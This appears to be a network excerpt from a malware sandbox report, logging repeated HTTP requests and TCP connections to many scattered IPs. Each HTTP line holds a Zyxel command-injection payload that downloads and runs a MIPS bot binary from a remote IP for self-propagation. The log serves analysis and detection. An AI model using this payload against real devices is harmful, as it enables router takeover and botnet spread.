            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownTCP traffic detected without corresponding DNS query: 91.181.41.52
            Source: unknownTCP traffic detected without corresponding DNS query: 125.131.230.134
            Source: unknownTCP traffic detected without corresponding DNS query: 197.79.64.252
            Source: unknownTCP traffic detected without corresponding DNS query: 41.123.95.50
            Source: unknownTCP traffic detected without corresponding DNS query: 197.166.54.119
            Source: unknownTCP traffic detected without corresponding DNS query: 197.204.38.33
            Source: unknownTCP traffic detected without corresponding DNS query: 157.7.179.72
            Source: unknownTCP traffic detected without corresponding DNS query: 157.46.5.99
            Source: unknownTCP traffic detected without corresponding DNS query: 157.64.56.30
            Source: unknownTCP traffic detected without corresponding DNS query: 157.35.19.87
            Source: unknownTCP traffic detected without corresponding DNS query: 41.45.68.170
            Source: unknownTCP traffic detected without corresponding DNS query: 41.136.152.103
            Source: unknownTCP traffic detected without corresponding DNS query: 41.42.148.198
            Source: unknownTCP traffic detected without corresponding DNS query: 41.132.198.239
            Source: unknownTCP traffic detected without corresponding DNS query: 41.176.32.97
            Source: unknownTCP traffic detected without corresponding DNS query: 75.216.114.51
            Source: unknownTCP traffic detected without corresponding DNS query: 41.105.121.62
            Source: unknownTCP traffic detected without corresponding DNS query: 41.133.114.17
            Source: unknownTCP traffic detected without corresponding DNS query: 94.28.201.99
            Source: unknownTCP traffic detected without corresponding DNS query: 166.8.31.87
            Source: unknownTCP traffic detected without corresponding DNS query: 197.189.134.195
            Source: unknownTCP traffic detected without corresponding DNS query: 157.209.211.16
            Source: unknownTCP traffic detected without corresponding DNS query: 98.147.33.27
            Source: unknownTCP traffic detected without corresponding DNS query: 41.183.53.200
            Source: unknownTCP traffic detected without corresponding DNS query: 157.111.152.56
            Source: unknownTCP traffic detected without corresponding DNS query: 41.215.25.240
            Source: unknownTCP traffic detected without corresponding DNS query: 197.102.6.248
            Source: unknownTCP traffic detected without corresponding DNS query: 81.115.4.241
            Source: unknownTCP traffic detected without corresponding DNS query: 197.83.209.148
            Source: unknownTCP traffic detected without corresponding DNS query: 197.4.227.227
            Source: unknownTCP traffic detected without corresponding DNS query: 197.204.90.173
            Source: unknownTCP traffic detected without corresponding DNS query: 41.128.221.149
            Source: unknownTCP traffic detected without corresponding DNS query: 197.14.31.31
            Source: unknownTCP traffic detected without corresponding DNS query: 41.169.204.3
            Source: unknownTCP traffic detected without corresponding DNS query: 41.54.131.140
            Source: unknownTCP traffic detected without corresponding DNS query: 41.222.246.94
            Source: unknownTCP traffic detected without corresponding DNS query: 197.138.19.58
            Source: unknownTCP traffic detected without corresponding DNS query: 157.28.225.90
            Source: unknownTCP traffic detected without corresponding DNS query: 197.254.183.164
            Source: unknownTCP traffic detected without corresponding DNS query: 197.151.50.97
            Source: unknownTCP traffic detected without corresponding DNS query: 115.242.36.56
            Source: unknownTCP traffic detected without corresponding DNS query: 41.91.222.151
            Source: unknownTCP traffic detected without corresponding DNS query: 157.163.5.183
            Source: unknownTCP traffic detected without corresponding DNS query: 41.26.50.215
            Source: unknownTCP traffic detected without corresponding DNS query: 157.226.211.84
            Source: unknownTCP traffic detected without corresponding DNS query: 211.86.135.35
            Source: unknownTCP traffic detected without corresponding DNS query: 206.34.192.222
            Source: unknownTCP traffic detected without corresponding DNS query: 41.225.6.162
            Source: unknownTCP traffic detected without corresponding DNS query: 157.17.27.14
            Source: unknownTCP traffic detected without corresponding DNS query: 157.77.90.213
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
